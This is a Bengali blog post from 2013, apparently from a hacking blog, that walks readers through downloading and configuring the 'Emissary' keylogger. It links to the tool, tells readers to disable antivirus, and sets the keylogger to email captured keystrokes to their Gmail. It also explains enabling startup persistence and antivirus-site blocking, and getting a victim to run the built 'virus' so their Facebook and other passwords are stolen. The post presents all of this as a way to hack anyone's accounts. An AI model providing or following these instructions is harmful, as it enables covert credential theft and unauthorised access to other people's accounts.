Friday 11 January 2013

আবারও হ্যাক হবে সব অ্যাকাউন্ট ( কিলগার আপডেটেড)


আজকে যেই কিলগার টা শেয়ার করবো তার নাম Emissary কিলগার । এটা ভাল কাজ করে সেই জন্যই এই কিলগার টা শেয়ার করলাম ।
কিছু কথা ঃ    যেকোনো অ্যাকাউন্ট হ্যাক করা যায় এই কিলগার দিয়ে । কিলগার মূলত একটা প্রোগ্রাম যা আপনি কীবোর্ডে যা যা টাইপ করবেন তা আপনার কাছে পাঠাবে এবং সব কিছুই গোপনে ।
এবার চলুন শুরু করি।
  • প্রথমে কিলগার প্রোগ্রাম টা ডাউনলোড করুন পাসওয়ার্ড দিয়ে Unrar করুন ।
www(dot)hacking24-bd.blogspot.com
অথবা   https://ho t file.com/dl/179131685/c15ae3b/Emissary_keylogger.rar.html
বিঃদ্রঃ দয়া করে এন্টিভাইরাস প্রোগ্রাম কিছু সময়ের জন্য বন্ধ রাখুন । হ্যাক হবেন না । এন্টিভাইরাস হ্যাকিং টুলস গুলোকে ভাইরাস মনে করে । তবে এই সুজকে অনেকেই ভাইরাস বাইন্ড করে দেয় কিন্তু এইটা সম্পূর্ণ ঝুকি মুক্ত ।
  • এবার কিলগার টা ওপেন করুন ।  Windows XP তে সাধারণভাবে এবং Windows 7 এ "Run as administrator" এ।
  • এবার ভালভাবে লক্ষ করুন ।
  • Gmail Username : এ আপনার জিমেইল আইডি দিন প্রয়জনে নতুন অ্যাকাউন্ট অপেব করুন
বিঃদ্রঃ আমরা জিমেইল ব্যবহার করবো। অন্য কন কিছু ব্যবহার না করাই ভাল।
  • Gmail password : এ আপনার পাসওয়ার্ড দিন ।
  • এবার "Test Mail" চাপুন ।

  • একটু সময় দিন এবং নিচের মত একটি ম্যাসেজ পাবেন
  • জিমেইল ওপেন করুন আর দেখুন কোন মেইল পেয়েছেন কিনা ( নিচের চিত্র)
  • Server name: এ আপনার তৈরি কিত ভাইরাস এর নাম দিন ।
  • Interval : এ কত সময় পর পর মেইল পেতে চান সেই সময় দিন।
  • অপশন ব্যবহার করতে পারেন । নিচের গুলো টিক দিন ।
  1. Block Av site
  2. add to start up
  3. Antis
  • এবার কাজ শেষ "Build Server" এ ক্লিক করুন ।

  • নিচের মত দেখতে পাবেন ।
  • এবারে যেই ফোল্ডার এ কিলগার টা রাখা আছে সেখানে আপনার তৈরি ভাইরাস টি পাবেন । :)
তবে এখন ফেসবুক বা যে কোন অ্যাকাউন্ট হ্যাক হবে কিভাবে?

ধরুন আমার পিছিতে আমি ভাইরাস টা ওপেন করাতে পেরেছেন এখন কিলগার এর ধর্ম অনুযায়ী আপনার কাছে পাঠাবে আমি যা যা টাইপ করেছি । সুতরাং, ধরুন কিলগার ভাইরাস টা আমার পিসি তে ওপেন হবার পর আমি আমার ফেসবুক এ যাব তখন আমাকে আমার ইনফরমেশন দিতে হবে কীবোর্ডে টাইপ করেই :) আর সেইটা পাঠিয়ে দিবে কিলগার টা আপনার কাছে আর তার পর .........। :)
এভাবেই অ্যাকাউন্ট হ্যাক হয় :) আমার টিপস দেখুন এখানে ।

No comments:

Post a Comment